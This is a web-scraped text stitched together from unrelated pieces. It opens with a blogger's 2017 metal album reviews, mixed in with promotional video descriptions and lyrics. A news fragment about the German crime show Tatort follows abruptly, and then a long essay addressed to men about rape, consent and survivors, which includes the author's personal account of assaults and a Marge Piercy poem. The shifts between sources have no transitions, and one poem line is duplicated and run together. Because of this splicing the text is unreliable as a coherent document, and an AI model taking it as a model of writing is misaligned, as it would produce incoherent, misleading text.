PALLBEARER - Thorns ( OFFICIAL TRACK )
Track taken from the album ' Heartless ' .
Out march 24th .
SUBSCRIBE to Nuclear Blast YouTube : http://bit.ly/subs-nb-yt » Heartless « is also now available for pre-order : http://nblast.de/PallbearerHeartlessNB
Pre -order » Heartless « digitally and receive ' Thorns ' immediately or stream the song : http://nblast.de/PallbearerDigital
FOLLOW PALLBEARER : http://pallbearerdoom.com/
https://www.facebook.com/pallbearerdoom
https://twitter.com/pallbearerdoom
https://www.instagram.com/pallbearerdoom/
Profound Lore : https://www.facebook.com/profoundlorerecords/
http://profoundlorerecords.com/ twitter : @profound_lore instagram : @profoundlorerecords Copyright 2017 Profound Lore Records
One of my bigger disappointments of the year .
Pallbearer had me with their last album , 2014 ’s Foundations of Burden .
But this time around … it does n’t connect .
There ’s obviously some good things here .
The vocals are the best they ’ve done .
The production is pleasingly well done .
There ’s some memorable guitar lines that stick with you .
It ’s not particularly crushing or heavy , but Pallbearer was never one to live on doom metal ’s harder edges .
Most of the compositions just feel meandering , and lacking in both power and expressiveness .
It ’s clearly not as heavy as Foundations of Burden , pulling in more of a Pink Floyd influence .
But it also does n’t embrace that kind of Floydian take on space / prog - rock fully either , so what ’s left is plodding doom - lite guitars driving songs that never get around to going anywhere interesting .
It feels like an album stuck in transition .
It ’s never unpleasant to listen to , but it never leaves much impression either .
Ignoring signs
We believed that we were blameless
Then the harm could not be undone
We hang ourselves
From any rope put here to save us
And seal our fate
Together
To die as one
Mastodon - Emperor of Sand
Mastodon - Steambreather [ Official Music Video ] New Album ' Emperor of Sand ' available now : Album Bundles – https://wbr.ec/eosbundles
Google - https://wbr.ec/eosg
Amazon - https://wbr.ec/eosamzn
Spotify - https://wbr.ec/eoss
Apple - https://wbr.ec/eosapple
iTunes - https://wbr.ec/eosi Production Company : Blink Art Executive Producers : Ben Honour , Helen Parker Directors : Essy May & Stevie Gee Producer : Hugo Donkin Cast : Metaller Small : Preston Nyman Metaller Big : Chris Hayward Master Don : Arnab Chanda Hippy Woman : Ellie White Frazzled Teacher : Mark Davison Art Dealer : Emma Sidi Helper Woman & Clown 1 : Ruth Syratt Helper Man & Clown 2 : Mike May Killer Clown , Bat & Death Hand : Stevie Gee Crew : 1st AD : Ruaidhri Ryan DOP : Ed Tucker Focus Puller : Beau Scott Camera Assistant : Cleo Vogler Gaffers : Ben Skyrme & Max Halstead Electricians : Chris Broomfield , Will Kay & Tina Georgieva Production Design : Essy May , Stevie Gee Art Director : Brin Frost Art Dept : Brin Frost , Alannah Byrne , Stevie Gee , Isobel Irwin , Emma Sheehy , Adeena Grubb Casting : Charlie Perkins Make Up : Roz Gomersall Wardrobe : Brin Frost , Cha Cha Cha Vintage Runners : Ben Tisdall , Lara Baxter Post Production : Visual Effects Director : Theo Nunn Background Artist : Essy May Editor : Jack Williams Animation Directors : Stevie Gee & Essy May 2D Animator : Daniel Britt Compositing : Theo Nunn , Jac Clinch , Joe Eckworth Colour Grade : Smoke & Mirrors Smoke & Mirrors Colourist : Jonny Tully Smoke & Mirrors Producer : Andy Salem Special
Thanks : St Mary at Finchley Blinkink Arri Panalux Connect with Mastodon : http://mastodonrocks.com
http://facebook.com/mastodon
http://twitter.com/mastodonmusic
http://instagram.com/mastodonrocks
After two exceedingly underwhelming albums , I stopped expecting Mastodon to deliver anything that would interest me .
However , after they released the single “ Sultan ’s Curse ” alongside the announcement of the new album , I thought , “ hmm …. maybe ” .
The song itself was n’t spectacular , but did at least hint at some return to the style within which they had produced more interesting material .
Alas , it was n’t to be .
Far from a return to heavy and powerful , Emperor of Sand finds the band completing its migration into “ crossover ” territory , with limited success .
Ironic for the band that as recently as 2014 was sniping at Dave Grohl for “ making rock n roll safer ” .
Just three years later , Mastodon finds themself becoming what they claimed to dislike , because this album is filled with Foo Fighters -y dad - rock .
Surprisingly , the song on the album that I most care to listen to again is actually the most Foo Fighters - like of them all : “ Show Yourself ” .
It ’s very much “ safe ” rock and roll , and it was unquestionably recorded with an eye at sneaking into radio rotation ( with some success , apparently , peaking at # 16 on Billboard ’s Rock Airplay chart , the band ’s highest ranking single ) .
But it ’s extremely memorable and enjoyable , which is more than can be said of the material that follows it .
In the end , the album is disappointing in every aspect .
It further confirms that the band that created albums like Leviathan is long gone , and even the band that created Crack the Skye seems to be beyond return .
At the same time , they only really managed one track that succeeded in the more straightforward rock format that they ’ve pivoted to .
A collection of songs that lives up to “ Show Yourself ” would at least be a worthwhile dad - rock album .
Sadly , we did n’t get that either .
( I picked a song other than “ Show Yourself ” for the video above , as it ’s more representative of how boring the album is . )
You ’re not as safe as far as I can tell
And I can tell
Only you can save yourself
Soon this will all be a distant memory
Or could this dream
Be real at all ?
Myrkur - Mareidt
MYRKUR - Ulvinde ( Official Music Video ) ' Mareridt ' Out Now on CD / LP / DLX 2xLP / Digital Order via Relapse Records Here : http://bit.ly/MyrkurMareridt Subscribe to Relapse Records Channel : http://bit.ly/RelapseYouTube
Directed , Photographed , and Edited by Mats Ek. Instagram : @matstxswe Choir Girls : Kari Kvittingen Djukastein , Amalie Hagesæter Gåsvær & Pernille Josefine Smit Order on Bandcamp : http://myrkur.bandcamp.com
Order on iTunes : http://geni.us/MareridtiT
Order on Amazon : http://geni.us/MareridtAMZ
Order on Google Play : http://geni.us/MareridtGP
Mareridt ( translation : Nightmare ) is the highly anticipated sophomore full - length from renowned Danish composer and multi-instrumentalist MYRKUR .
Recorded between Copenhagen and Seattle with producer Randall Dunn ( Marissa Nadler , Earth , Sunn O ) ) ) , Boris , Wolves In The Throne Room ) , Mareridt is a rich juxtaposition of the dark and the light ; the moon and the mother earth ; the witch and the saint .
MYRKUR explores deeper into the mysterious and the feminine with 11 tracks that further progress her visionary blend of metal with gorgeous , stirring melodies , dark folk passages , choral arrangements and superb , horrific beauty .
Further taking MYRKUR to new artistic heights are lyrics in multiple languages , an unforgettable collaboration with Chelsea Wolfe and an array of special instrumentation including violin , mandola , folk drums , nyckelharpa ( an ancient Swedish key harp ) , and Kulning ( an ancient Scandinavian herding call ) .
Mareridt is a profound manifestation of nightmares that demonstrates MYRKUR as one of the truly exceptional artists of our time .
Official Links : Myrkur Official Website : https://www.myrkurmusic.com/
Myrkur on Bandcamp : https://myrkur.bandcamp.com/
Myrkur on Facebook : http://www.facebook.com/myrkurmyrkur
Myrkur on Instagram : https://www.instagram.com/myrkurmyrkur/
http://www.relapse.com
http://www.facebook.com/relapserecords
http://www.relapserecords.bandcamp.com
http://www.twitter.com/relapserecords
https://www.instagram.com/relapserecords
The dislike ( and sometimes outright hatred ) of Myrkur among sections of the metal community is absurd .
The oft - repeated claim that her work is “ pop music posing as black metal ” , and is “ manufactured ” for “ album sales ” is ridiculous enough to dismiss outright ( black metal does n’t exactly sell a lot of albums , and a “ blonde girl ” pop artist would make far more money selling , you know , pop records ) .
And if that was n’t enough , the numbers show that her album did n’t exactly sell like hotcakes , not that that ’s going to satisfy the black metal truthers that are certain she ’s making “ poser ” money .
That nonsense aside , I enjoyed her last album , and had high hopes for this one , but was let down .
There are some good moments , particularly the track she shares with Chelsea Wolfe .
Her vocals generally deliver , moving between screeches and breathy ethereal parts .
But the sections where she channels Scandinavian folk music fail to make much impact , and the weakest material is right smack in the middle of the album ( not counting a cringeworthy closing track that should just have been cut entirely ) .
There ’s about an EP worth of good material here , but the dispersion of it is such that the album stumbles and loses momentum as soon as it starts to go somewhere .
Not bad , just not fully baked .
Am I adored ?
Je suis votre amour
Am I a whore ?
Cause you are the drug
Solitary are the things i know
In my garden they leave me alone
Sarin - Darker Lakes
Unlike most of the other albums in the Participation Ribbon section , I actually like this one .
I listened to it quite a bit .
It is n’t a special record that I had to have in my top 40 or so albums , but it ’s an underrated one that I wanted to call out .
It ’s good , largely instrumental post-metal , with influences worn on their sleeve .
But a couple of aspects stand out .
First is the contrast between the dark guitar - driven compositions and some of the uplifting synth - driven parts .
The second is the clean production .
Between those two things , it was an easy listen , and one I often put on in the car this year when I was n’t necessarily in the mood for absolute punishment .
It is n’t going to win awards and it probably wo n’t appear on many year - end lists , but it ’s an underrated album , and one that listeners who like this sort of music but want something that goes down a little easier should check out .
I do n’t know , I listened to this again , and maybe I should have bumped it up into Honorable Mentions .
Dreadnought - A Wake in Sacred Waves
Dreadnought Live Promo - Within Chanting Waters Dreadnought at Hi-Dive Denver , CO 02/09/2017 " A Wake In Sacred Waves " 2 x 180g LP / CD / Digital AVAILABLE NOW : https://dreadnoughtdenver.bandcamp.com/
https://www.facebook.com/dreadnoughtband
https://dreadnoughtdenver.com/
Video by Ben Fout : http://www.thebande.co
I feel like I should like this album .
There are elements I like , and plenty of moments I like .
The dual female vocalists , bringing both beautiful harmony and raspy black metal shrieks to the table , are winners .
The folk elements , with flute and mandolin , contrast nicely with the progressive , doom -y metal .
At any given moment , it sounds pretty great .
But actually sitting and listening to these four 10 + minute tracks is a bit unsatisfying .
There ’s a lack of direction , and those good moments seem to peter out and not take the songs anywhere .
I mean , do n’t get me wrong , I ’ll listen to 60 minutes of atonal droning , but that ’s not what Dreadnought is trying to be .
The songs just sort of drift on , and I just end up drifting away while I ’m listening .
I can see what people like , but it ’s not getting me there .
( None of this album ’s tracks are posted as YouTube videos that I could find , that video is as close as I could get . )
Asira - Efference
Asira - Crucible of Light Crucible of Light is taken from Asira 's debut album ' Efference ' .
http://www.facebook.com/asirauk
http://www.asira.bandcamp.com
http://www.asira-band.com/
Sunrise , crucible of light Oracular presence , enshrined Golden dawn , blessed by Apollo ’s rays Solar beams intertwined Now , claiming our eyes Ablaze , baptise None halt your rise Dawn will claim my eyes Radiant high Ablaze , arise Morning star
As its luminescence nears A healing sphere Darkness disappears Helios severs the fading night Aurora incandescent Circadian flight Searing , diurnal light Dawn will claim my eyes Radiant high Ablaze , arise Golden dawn will claim my eyes Radiant high Ablaze , arise Morning star
This is a cool one , which just missed my Honorable Mention list , but I think deserves to be called out regardless because it ’s a debut album of a band that is onto something .
Black metal is everywhere , and there are lots of bands playing “ blackened ” versions of other subgenres of metal .
But nobody ’s really doing blackened prog-metal , at least not doing it quite like Asira .
When I say prog-metal , I ’m talking metal that is influenced by Pink Floyd , King Crimson , and other ‘ 70s symphonic rock bands .
If that reminds you a bit of metal - era Opeth , that ’s an apt comparison , as Opeth certainly comes to mind more than a few times during this album .
But then there ’s that “ blackened ” part , and that ’s where Asira adds a wrinkle that sets them apart .
Just listen to the embedded track ( the whole thing ) to get an idea .
Add in some Floyd - ian ambient / atmospheric sections , and some Opeth - like pastoral metal bits , and you ’ll have an idea what the album sounds like .
What keeps it off my best - of list is that the entire album does n’t live up to the peaks of songs like the one above .
The band is clearly still figuring out their identity .
It ’s still a good album , but I am hoping for an even better successor .
Electric Wizard - Wizard Bloody Wizard
Electric Wizard - See You In Hell Electric Wizard " See You In Hell " a short film ( Directed By Marek Steven ) Witchfinder Productions , Witchfinder Records / Spinefarm Records 2017 Music video by Electric Wizard performing See You In Hell .
( C ) 2017 Spinefarm Records , a Universal Music Company http://vevo.ly/Qye4HB
Ugh , I had such hopes for this .
The last two things Jus Oborn has touched were Cough ’s latest album , Still They Pray ( as producer ) , and Wizard ’s own most recent album before this one , Time to Die .
Both had what I love about Electric Wizard in abundance : impossibly thick fuzz , grimy stoned out riffs , vocal wails and warbles … the stuff that made the Wiz great .
Instead , we get this album , which feels more like a slightly underground ‘ 70s rock album .
The album opener “ See You in Hell ” is the boring low point , but it does n’t really get off the launch pad after that either .
The Sabbath worship is apparent , as it always has been , but this is less being inspired by Sabbath , and more trying to play a clone of what Sabbath was playing in 1970 , without any of the heaviness modern recording permits .
Thing is , Sabbath absolutely would have had a bigger , heavier sound if they had the tools for it in 1970 - and what they may have lacked in recording punch , they made up for instead in the riffs themselves .
Wizard Bloody
Wizard ’s riffs never come close to measuring up , leaving the whole thing as a hopelessly tepid affair .
Time to Die was underrated , in part because legal issues with their former drummer saw the album pulled from shelves and from streaming services a few months after release .
This meant a lot of listeners who did n’t get in on it at release time missed out , and many did not go back to it after the album quietly became available again , over a year later .
If that group includes you , do yourself a favor , and go listen to that instead .
It ’s got way more of what you want .
Here , I ’m going to embed a track here for comparison .
You listen and decide .
Electric Wizard - I am nothing OFFICIAL PROMO from " time to die " LP 2014 by Electric Wizard
Tchornobog - Tchornobog
TCHORNOBOG - Hallucinatory Black Breath of Possession ( 2017 ) Fallen Empire Rec. / I , Voidhanger Rec.
Direct links are provided to purchase ' Tchornobog ' on digipak CD , vinyl , cassette , and digital format .
Additional links are given for Tchornobog , Fallen Empire Records and I , Voidhanger Records .
" II : Hallucinatory Black Breath of Possession ( Mountain - Eye Amalgamation ) " is the second song on the album .
' Tchornobog ' release date - July 21st , 2017 .
Digipak CD ( I , Voidhanger Records webshop ) http://i-voidhanger.com/product/tchornobog-tchornobog-cd-digipack
Digipak CD / digital format ( I , Voidhanger Records , Bandcamp ) https://i-voidhangerrecords.bandcamp.com/album/tchornobog
Vinyl / cassette ( Fallen Empire Records webstore )
http://store.fallenempirerecords.com/products?utf8=%E2%9C%93&search=Tchornobog&search-submit=
Cassette/digital format ( Markov Soroka / Fallen Empire Records , Bandcamp ) https://markovsoroka.bandcamp.com/album/tchornobog
Tchornobog Facebook - https://www.facebook.com/pg/Tchornobog
Instagram - https://www.instagram.com/tchornobog
Metal Archives - https://www.metal-archives.com/bands/Tchornobog/3540426943
Fallen Empire Records Homepage - http://www.fallenempirerecords.com
Facebook - https://www.facebook.com/FallenEmpireRecords
I , Voidhanger Records Homepage - http://i-voidhanger.com
Facebook - https://www.facebook.com/i.voidhanger.records
YouTube - https://www.youtube.com/user/lVoidhangerRecords
Promotional purposes sanctioned by Tchornobog , Fallen Empire Records and I , Voidhanger Records .
There ’s a good album in here .
I know there is .
Other people can hear it .
I can almost hear it .
But the reason I ca n’t hear it is the awful , awful production .
To have an album this dynamic and record it like a shitty black metal band playing to a tape recorder in their garage is criminal .
All I could do when listening to this was imagine what it should have sounded like .
Get this guy ( it ’s a one - man project ) into a decent studio .
BERLIN 
When “ Law & Order ” kicks off its new season next month , it will tie “ Gunsmoke , ” at 20 years , as America ’s longest - running prime - time drama .
Here in Germany , where a police procedural called “ Tatort ” has been around nearly four decades , 20 years can seem as ephemeral as a high school romance .
“ Tatort ” is a little akin to what Johnny Carson ’s “ Tonight Show ” was in America .
It ’s one of those modest pop-culture symbols and long - standing common experiences that can be hard for outsiders to translate but that speak to , and of , a nation .
First broadcast in 1970 , before video games or food processors and when Germany seemed permanently split in two , the show adopted the age - old formula of a pair of detectives solving a murder to devise a distinctly German version of the crime drama .
Relatively speaking , violent crime is n’t common here .
The killing of four people by a gunman who went on a rampage near Düsseldorf last week was all the more shocking for being exceptional .
With a population of 82 million , Germany had 864 homicides in 2007 ; there were around 20 times as many in the United States , where the population is not quite four times as big .
Maybe that ’s a reason “ Tatort ” ( it translates as “ Crime Scene ” ) plays down graphic violence in favor of character development and crime solving .
Do you know that you should n't walk home alone at night , or on unlit streets ?
That when walking home , you should have your house key between your fingers to poke a potential attacker in the eyes or throat ?
How about that if you do n't want to be raped , you need to be sure your skirt is somebody 's idea of the right length , that you do n’t sway your hips when you walk , that you should n't be alone with new dates -- especially not alone in large groups of men-- that you should n't say aloud that you enjoy sex where men can hear you , should n't drink -- not because you 'll get liver damage or become an alcoholic , but because it 'll result in you being raped ?
Did you know that if someone tries to force you to have sex , that you should n’t fight back , but should probably just try to be nice to them ?
How about that if you say yes to one kind of sex , you ’d best be prepared to have every other kind of sex your partner wants , and that if you want to avoid being raped , you ’d best say no to ANY kind of sex , even the sex you DO want ?
If these things are n’t as familiar to you as the nose on your face , I can guarantee you that they are for nearly every woman you know .
Women have this stuff drilled into our heads endlessly , from nearly everywhere we look , all with the aim of helping us prevent something from happening we are n’t even doing .
Almost every article we see when it comes to rape prevention is aimed at women – the ones most often getting raped -- not at men , who most often are the ones doing the raping .
It ’s a bit like if all the warnings we see about driving drunk were aimed at people hit by drunk drivers : “ Do n’t ever get in your car : someone else might be drunk ! ” or “ To prevent your drunk driving death , never leave the house during happy hour : someone might be drinking and driving . ”
Imagine , too , if when you found yourself or someone you loved hit by a drunk driver , the common sentiment about that trauma was that unless the person hit was doing everything possible to avoid being hit – like , say , never leaving the house , or only leaving the house when dressed in SUV - resilient armor – then it was only partly the drunk driver ’s fault , and maybe not that driver ’s fault at all .
If you were n’t doing everything you could to not get hit , well then it ’s really your fault you got hit , not the fault of the moron full of vodka behind the wheel .
Reading this piece if you are a male survivor of sexual abuse has got to be doubly difficult .
While more women than men are raped , a lot of men -- particularly when they are boys -- are raped : at least 10 % of rapes happen to male victims , and probably more than that : women underreport rapes , but men report them even less often .
Even on the low end of the scale , that 's a LOT of men , and any one of you reading this might be part of that group .
Please understand that for those of you who are survivors of rape yourself , I do n't aim to compound your trauma by increasing a gender conflict you may well feel when it comes to rape .
If you are a male rape survivor and need some extra support , check out these links .
Those articles about rape prevention telling women all they can do to prevent rape ?
This is n't one of those articles .
This one ’s for the men .
Prefer to read something this big in smaller sections ?
No problem .
Why do men need to know about rape ?
Rape is often framed as about women , but it 's not .
Something done TO us really is n't about us .
It 's the things that we choose to do which are about us , which is why it 's such an error for rape to be framed as a women 's issue or about women : it 's almost always a men 's issue and really about men .
Potential victims of rape often can't prevent it from happening , even when we follow every instruction on avoiding rape .
Sure , we can learn self - defense and use it , and employ a few things to minimize our chances of being raped , or escape from a rape , but for the most part , whether or not a rape happens is up to the person who would or does rape .
Making the prevention of rape the responsibility of victims or potential victims is incredibly ineffective .
Yet , we rarely see pieces written for the other half of the equation -- to someone who might be , or is , a rapist ; to someone who might be , or is , knowingly or unknowingly enabling rape , and to the men who have more influence over each other than women can have over them .
If men do n't know NOT to rape , how not to enable rape , and do n't know that both are their responsibility – not just the responsibility of women -- all the self - protection in the world on a potential victim ’s part is n't going to help very much .
However hard it is for any of us to accept , most rapes are perpetrated by men .
Much of how rape is treated and enabled is about male behavior and what men do and do n't do .
Let ’s face facts : around one out of every three to four women or girls has been or will be raped or sexually assaulted in her lifetime .
Based on sound data from diverse sources , around 90 % of all rapes are those where the victims are female , identify as female and / or are identified by the rapist as female .
Even if you do n't know it , you probably have at least one woman in your life you know and care a lot about -- your mother , a grandmother or aunt , a sister , a girlfriend , a friend , a mentor – who has been or will be raped in her lifetime .
Transpeople and people who do n't fit typical gender roles are raped too .
We do n't know what the statistics are , but we know they 're high .
Trans and gender - nonconforming people are particularly vulnerable to violence , and that includes rape .
As with other people who experience sexual assault , transpeople are reluctant to report , for many reasons , including the fear of being harassed or ignored by health care professionals and criminal justice authorities .
The Injustice at Every Turn : A Report of the National Transgender Discrimination Survey is a comprehensive and recent survey which reveals the level of abuse and mistreatment experienced by gender - nonconforming folks from various institutions , including courts , hospitals and rape crisis centers .
It ’s usually estimated that at least 10 % , and probably more , of rapes are to male victims , and for men and women both , close to 99 % of their rapists are male ( Statutory rape , based on a victim being unable to legally consent to sex due to age , is the most common form of rape by female perpetrators .
It should also be noted , however , that female perpetrators are often found to be more common in the case of child abuses , including sexual abuse , than teen and adult abuses , so those figures are often not included in rape statistics because they are instead filed with child abuse data .
But even when those things are factored in , the vast majority of rapists are male ) .
It is most common to be raped in early adolescence , the teens or young adulthood , and rape is a vastly underreported crime : with women , it 's estimated that less than 40 % of rapes are reported overall ( and among young people , substantially less than that ) , and with male victims , the rate of reporting -- primarily because a man who has been raped is often framed by other men as then being less of a man , or as a victim being “ made ” gay or into a woman – is even lower .
Most experts in sexual abuse and assault agree that certain aspects of culture designed and upheld by men , which many males often perpetuate , play a great part in enabling rape to all kinds of victims .
In other words , a lot of the way masculinity is commonly defined , idealized and enacted is one very big why for rape being as common as it is , for rape so often being seen as such a minimal crime , and for rapists often being treated better by people than their victims are .
It ’s obviously hard for guys to really look at this stuff , but it ’s also hard for women to know that rape is nearly always a crime done by men ( as well as to live in a world where it ’s something we are afraid of ) .
We love the men in our lives dearly , very much want to be able to trust men , and we think of men , as a group , as our brothers .
Suffice it to say , it ’s also really tough for us to have to know that our actual brothers , our fathers , our boyfriends , our male friends , might be or have been rapists : it ’s a terrible betrayal .
So , while we women can’t personally understand , in some ways , how it ’s got to feel for guys to be suspect with rape , or to know that it ’s a crime almost exclusively perpetuated by a group to which you belong , in plenty of ways , we feel your pain , because men belong to at least one of our groups too : to the all - people group .
It 's hard to acknowledge the reality of rape .
Think about it this way :
When we know that around one in four people have an STI we can't realistically deny that we or someone close to us may be one of those people .
The same goes here .
A rapist may be someone we know , even someone we 're close to , or even a person reading this right now .
It is tremendously hard to look at , I know , but all those men doing the raping are real people , and there are enough of them that many of us know or have known at least one of them .
They 're not imaginary bogeymen : many are “ regular ” guys .
Thinking about these things may make you feel angry or uncomfortable -- especially to be spoken to as a potential rapist or someone who could be enabling rape -- but it's an important reality .
We should be a LOT more angry about anyone being raped , and about anyone having to live in fear of rape , than we should be about anyone telling us that we need to be careful not to rape or enable rape .
There are things we can do to NOT rape someone , or to keep from enabling rape .
It 's a whole lot worse to be raped than it is to be considered a potential or even an actual rapist : someone can change their mind about how they consider you , especially when your actions stand counter to their accusations .
Even a bonafide rapist , if he is reported , charged and punished , which is a rarity , usually has a very limited time - frame during which he really has to deal with concrete consequences of his actions .
Rape victims have to deal with rape and its severe consequences -- something we did n't even choose to take part in -- for our whole lives , including people thinking things about us that are not often true and which are very hurtful .
In justice systems and many communities , rape victims hear rape is their fault far more often than rapists hear that it is theirs .
I 'm sure you do n't want to be raped , and I 'm sure you do n't want the women , girls and boys close to you to be raped or assaulted , either .
I am also darn sure that most people do n't want to be rapists , including you , and that most people do n’t really want to enable rape .
Even if you are sure none of this will ever apply to you , that you could not possibly rape someone else or perpetuate rape , just cultivating a real awareness about rape and raping can help you , the people around you , and our culture quite massively .
We 've only started to cultivate real rape awareness over the last few decades , and only in limited areas , but even in that short time and in those limited areas , awareness alone has helped to reduce some rates of rape markedly .
I ’m asking you to examine something personal and difficult , so I want you to understand that this is always personal and difficult for me , too .
I am a rape and sexual abuse survivor , more than once over .
I survived a molestation at the age of 11 from the friendly man who cut our hair as children .
I survived a physically violent gang assault at the age of 12 during which I was dragged out of my volunteer job by a group of boys who had been stalking me all afternoon , to whom I had verbally declined to go with earlier , more than once .
I survived a date rape in high school with a guy I really liked who I earnestly thought did just want to go sit at the beach with me , and maybe make out some , not force his penis down my throat to the point that I struggled to breathe .
I also managed to get myself out of an attempted acquaintance rape in my twenties at a friend 's house where I had fallen asleep on the couch after a night out , accepted what seemed a generous invite to crash there , and woke up with that guy trying to climb on top of me after he had removed some of my clothes in my sleep , and just a few years ago , fended off another attempt by another acquaintance at the pass by being lucky enough to see it coming well in advance .
My great - grandmother was raped and murdered in her own home at the age of 76 – something no one even told me in my family until I was an adult -- and I assure you that her skirt was n't too short and that no one misunderstood that she was n’t interested in sex with them .
A man I loved intensely grew up in foster care and was sexually assaulted in two out of the three homes he was in .
Neither my great - grandmother nor myself were dressed provocatively or “ asking for it , ” and even if we had been doing any number of the things so many women are told either makes rape somehow our responsibility , we still would n't be the people who got us raped : it was our rapists who did that .
It was n’t my ex-boyfriend ’s fault that he was placed in homes with abusive men as a boy , nor were those men owed sex because they fed and housed him : they chose to exploit someone they had pledged to care for .
So , beyond how often I deal with sexual violence in my work at Scarleteen and elsewhere , it 's a very personal and difficult issue for me , and one that has , obviously , had a large influence on my life .
Like most people , I do n't enjoy talking about rape .
I ’d love to never have to talk about it again .
It also makes a rape survivor more vulnerable than rape has made her or him already to talk about rape or their rapes so publicly that thousands and thousands of people will know they 've been raped .
But I talk about it , no matter how difficult , because it is so crucially important to talk about , and because until we all really get talking things are not going to get better .
I do n't want to say that I 'm asking a favor of you , because anyone doing what they can to keep people from being harmed , physically and emotionally , is not doing something incredible .
A person who neither rapes someone else , nor who does n't enable rape is n't being a hero : they 're simply being humane , but that basic humanity is far too often excused for men when they do n’t exercise it .
The bar is set low for you guys when you ’re all more than capable of raising it .
I 'm asking that you read through this to help you invest yourself in something that many of you could certainly get away with not investing yourselves in .
Therein lies the favor , because I 'm asking more than plenty will ask of you .
I 'm asking that you , knowing how difficult it is for someone like me to talk about it , afford me the mutual respect of reading about it and talking about it yourself , even though it ’s difficult for you , too .
What is rape ?
Rape is when one person wants and pursues a sexual act on , to or inside another person who does not want to participate , and who does not fully and freely consent to take part in that act .
Someone giving consent to sex is someone giving a clear , active and enthusiastic yes , and who is clearly , actively and enthusiastically participating throughout ( we ’ll talk in more depth about consent in a bit ) .
Partnered sex is about two people equally sharing something sexually , but rape , while it involves and effects both people , is only really about what one person , the rapist , desires and chooses to do to that other person against their will .
Unwanted sexual touch or sexual use of someone through force or coercion is rape .
To coerce someone sexually is to get them to engage in a sexual activity they do not want through guilt - trips or nagging , threats , bribes , intimidation or some other kind of emotional pressure or force .
Where on the body is unwanted touch rape ?
Touching someone ’s vulva or vagina , breasts , buttocks , anus , penis , testicles , mouth , or other parts of the body without permission , when that touch is intentional and sexual on your part , or is considered sexual by most people , are all rape or sexual assault .
( The laws are different in different places .
In some places , rape and sexual assault mean the same thing ; in others , meanings differ based on the activity or situation ) .
It is also rape to make someone else touch YOU when they do n’t want to , or to force or coerce someone into doing something sexual with someone else .
It is rape when one person does something sexual on , to or inside a person who is unable to give informed consent to sex because they ’re asleep or otherwise incapacitated , like via drugs or alcohol ( even if they drank or drugged of their own accord ) , because they 're ill , injured , or emotionally bereft , or due to lack of physical , intellectual or emotional maturity , developmental disability , mental illness or because the person assaulting them is in a position of power over them , like a teacher , clergyperson or police officer .
( If you 're wondering why I do n’t say rape can be , say , vaginal intercourse or oral sex , rather than unwanted touch , that 's because words like sex or intercourse imply that both parties are mutually engaged and involved .
Because rape is n't sex for the person being raped , calling it sex not only enables rape , it also is a terribly hurtful thing to hear as a survivor , and one that can have a harsh impact on your sexuality : if rape was sex , then the victim was somehow complicit , and it also does n’t differentiate rape from the wanted , consensual sex we have and enjoy . )
It ’s also wise to think of attempted rape as very real sexual violence and violation , too .
Someone trying to rape you , but either failing to or deciding not to at some point , tends to leave the person almost raped with nearly as much emotional trauma as if they had been “ fully ” raped .
In other words , almost victimizing someone is still victimizing someone .
While sure , it ’s “ better ” to not - quite be raped than to be raped , I ’m sure you can imagine that it would be very traumatic to have your male best friend force you on the bed and rip at your clothes with the clear intent of raping you , even if he did n’t succeed in , or finish , doing so .
If some of this still seems unclear , that ’s understandable .
Not only is it often hard for people who have n’t been raped to figure out when rape has happened or what it is , it ’s sometimes hard even for people who HAVE been raped to figure it out .
Our culture has some seriously messed up ideas about sex , gender and sexuality which obfuscate the issue .
For instance , ideas that it ’s normal for women not to enjoy or initiate sex ( and abnormal for men to dislike any kind of sex with women at any time , including even when their partner is NOT enjoying it , or abnormal for men not to initiate ) , normal for women to not want sex as much as men ( and normal for male sexual needs to be more urgent than women ’s needs or for male sexual desire to be ever - present ) , or normal for women to want their sexual partners to dominate them ( and for male sexual partners to want to dominate ) are often stated and taken as absolute facts , even though those things are rarely normal , when we mean healthy , or biological in origin .
In the cases where they are common , these things often have more to do with how men and women are taught to enact or think about their sexuality than it does with our sex or gender , and with a sexual ethos that was designed to perpetuate a power hierarchy for men .
There are prevalent ideas that gay men or boys are fair game for anyone , that the first time a woman has sex she should feel devoured or violated and be in great pain , and that sexual violence is n’t a choice for men , but a biological imperative , but if we just do our homework and think about these things , it ’s pretty obvious to a smart person that they are not truths , but ideas which often excuse or deny sexual violence .
When it comes to young people , you are told so often that sex is something you ’ll regret if you have sex as a teen or an unmarried person , and that if you have sex , something terrible will happen .
So , young people who are raped often figure they ’re feeling the way they are because of sex , not because of rape : they were told they were going to feel terrible after all , right ?
And rape happens from strangers , not from your boyfriend , right ?
Young men who rape , thinking they were just having “ normal ” sex , might also have a hard time understanding that sex was rape because they have the idea that for their partner to be terrified and vacant , or to feel ashamed , guilty or victimized during or afterwards is normal .
Rape Poem by Marge Piercy
There is no difference between being raped
And being pushed down a flight of cement steps
Except that the wounds also bleed inside .
There is no difference between being rapedAnd being pushed down a flight of cement stepsExcept that the wounds also bleed inside .
There is no difference between being raped
And being run over by a truck
Except that afterward men ask if you enjoyed it .
There is no difference between being raped
And being bit on the ankle by a rattlesnake
Except that people ask if your skirt was short
And why you were out anyhow .
There is no difference between being raped
And going head first through a windshield
Except that afterward you are afraid not of cars ,
But half the human race .
The rapist is your boyfriend ’s brother .
He sits beside you in the movies eating popcorn .
Rape fattens on the fantasies of the “ normal ” male
Like a maggot in garbage .
Fear of rape is a cold wind blowing
All of the time on a woman ’s hunched back .
Never to stroll alone on a sand road through pine woods ,
Never to climb a trail across a bald
Without that aluminum in the mouth
When I see a man climbing toward me .
Never to open the door to a knock
Without that razor just grazing the throat .
The fear of the dark side of the hedges ,
The back seat of the car , the empty house
Rattling keys like a snake ’s warning
The fear of the smiling man
in whose pocket is a knife .
The fear of the serious man
In whose fist is locked with hatred .
All it takes to cast a rapist is seeing your body
As jackhammer , as blowtorch , as machine gun .
All it takes is hating that body
Your own , your self , your muscle that softens to flab .
All it takes is to push what you hate ,
What you fear onto the soft alien flesh .
To bucket out invincible as a tank
Armoured with treads without senses
To possess and punish in one act ,
To rip up pleasure , to murder those who dare
Live in the leafy flesh open to love .
The fear of the smiling man
In whose pocket is a knife .
What is it like to be raped ?
It ’s very difficult to talk about what rape feels like at exactly the moment it happens or is going to happen , because words rarely cut it .
Rape is a physical , emotional , intellectual , spiritual , personal identity , gender and sexual violation , all at once .
At the moment it happens , for most rape victims , something in the fabric of the world as we knew it rips wide open .
For those who had such low self - esteem they already felt they only deserved pain or suffering , rape validates that feeling .
But the pain of rape does n’t stop once the rape is over : not even close .
